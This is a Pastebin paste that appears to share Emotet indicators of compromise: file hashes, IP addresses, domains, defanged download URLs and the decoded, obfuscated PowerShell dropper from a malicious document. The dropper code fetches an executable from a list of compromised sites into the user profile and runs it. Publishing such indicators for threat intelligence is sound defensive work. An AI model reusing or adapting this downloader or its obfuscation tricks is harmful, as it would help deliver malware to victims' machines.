API tools faq
paste
paladin316

Emotet_Doc_out_2020-02-03_14_27.txt

paladin316
Feb 3rd, 2020
2,487
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
raw download clone embed print report
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 2aed441feb0d38c4c21858e907fb45a10a75f33c53158c64c67e85bab1e621c5
  5. ac2327f210643de38481941d82d7dddcdf00af04546849e465856cb8451241ee
  6. 2829244f2b1520590571662a8bf2d0b3db7d44f4755a920f09fb0881f707a8b7
  7.  
  8.  
  9. IPs:
  10. 104.18.56.166
  11. 104.18.57.166
  12. 107.180.2.223
  13. 120.78.167.124
  14. 172.105.174.17
  15. 185.32.20.6
  16. 188.85.143.170
  17. 192.241.143.52
  18. 195.223.215.190
  19. 35.237.206.52
  20. 69.16.201.104
  21. 98.199.196.197
  22.  
  23. Domains:
  24. fdhk.net
  25. HTTP
  26. iihttanzania.com
  27. myphamthanhbinh.net
  28. sfmac.biz
  29. www.bluedream.al
  30. www.cometprint.net
  31. www.mjmechanical.com
  32.  
  33.  
  34. hxxp://iihttanzania.com/wp-admin/N8CWI/
  35. hxxp://fdhk.net/plugins/8xshhk/
  36. hxxp://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/
  37. hxxp://realizaweb.site/cgi-bin/AbeNM155769/
  38. hxxp://rochun.org/error/7WJ1/
  39. hxxp://www.bluedream.al/calendar/r83g9/
  40. hxxp://myphamthanhbinh.net/wp-content/uploads/qDq/
  41. hxxp://sfmac.biz/calendar/K1a/
  42. hxxps://www.cometprint.net/cgi-bin/q/
  43. hxxp://www.mjmechanical.com/wp-includes/ddy/
  44.  
  45.  
  46. Decoded Base64 Powershell:
  47. $Jonbehomiwt='Rpsjfzzcee';
  48. $Jqiqrdywerejv = '933';
  49. $Vpryjauwezvg='Veztywnepzv';
  50. $Suidtvcknoih=$env:userprofile+'\'+$Jqiqrdywerejv+'.exe';
  51. $Imekoilmyvkms='Mqwdjkdyfka';
  52. $Biswqqqhwjdy=&('new'+'-ob'+'ject') NET.wEBCLIeNt;
  53. $Ivmqpivf='hxxp://iihttanzania.com/wp-admin/N8CWI/
  54. hxxp://fdhk.net/plugins/8xshhk/
  55. hxxp://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/
  56. hxxp://realizaweb.site/cgi-bin/AbeNM155769/
  57. hxxp://rochun.org/error/7WJ1/'."SPl`iT"('
  58. ');
  59. $Qasdgemka='Ykcxipgfl';
  60. foreach($Rgvjtnup in $Ivmqpivf){try{$Biswqqqhwjdy."dowNLO`A`dFI`LE"($Rgvjtnup, $Suidtvcknoih);
  61. $Ycstleozzolf='Dhgozdmbpeyig';
  62. If ((.('G'+'e'+'t-Item') $Suidtvcknoih)."lENG`Th" -ge 32019) {[Diagnostics.Process]::"stA`RT"($Suidtvcknoih);
  63. $Ulgybpkmt='Bprmfgyeharmv';
  64. break;
  65. $Mnvcyyiuuaywx='Turhklxrschki'}}catch{}}$Zksdcwrr='Suxmgjbqkgwuo'$Nahxbzxmnsmb='Gbmdnmghn';
  66. $Qshhtlnimac = '906';
  67. $Jllxiysvhp='Sbpbdavfzfgh';
  68. $Jaepuporub=$env:userprofile+'\'+$Qshhtlnimac+'.exe';
  69. $Pznfmjcoqlbpk='Yxrusllwfd';
  70. $Vodljxrzqmnl=&('new'+'-'+'obj'+'ect') NEt.weBClIENT;
  71. $Aiuwgxcngj='hxxp://www.bluedream.al/calendar/r83g9/
  72. hxxp://myphamthanhbinh.net/wp-content/uploads/qDq/
  73. hxxp://sfmac.biz/calendar/K1a/
  74. hxxps://www.cometprint.net/cgi-bin/q/
  75. hxxp://www.mjmechanical.com/wp-includes/ddy/'."S`PLIT"('
  76. ');
  77. $Pndfexli='Cdxreleao';
  78. foreach($Peyoauygfcguz in $Aiuwgxcngj){try{$Vodljxrzqmnl."DO`WNLoaDF`ilE"($Peyoauygfcguz, $Jaepuporub);
  79. $Wbhpmhlec='Zhnbmgwr';
  80. If ((&('Ge'+'t-It'+'em') $Jaepuporub)."l`ENgtH" -ge 39143) {[Diagnostics.Process]::"sTA`RT"($Jaepuporub);
  81. $Pvnxagasepx='Lvprqzdqaaep';
  82. break;
  83. $Yydwqzgl='Pgfdjdlb'}}catch{}}$Prqfazcypvjh='Cubthwma'
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!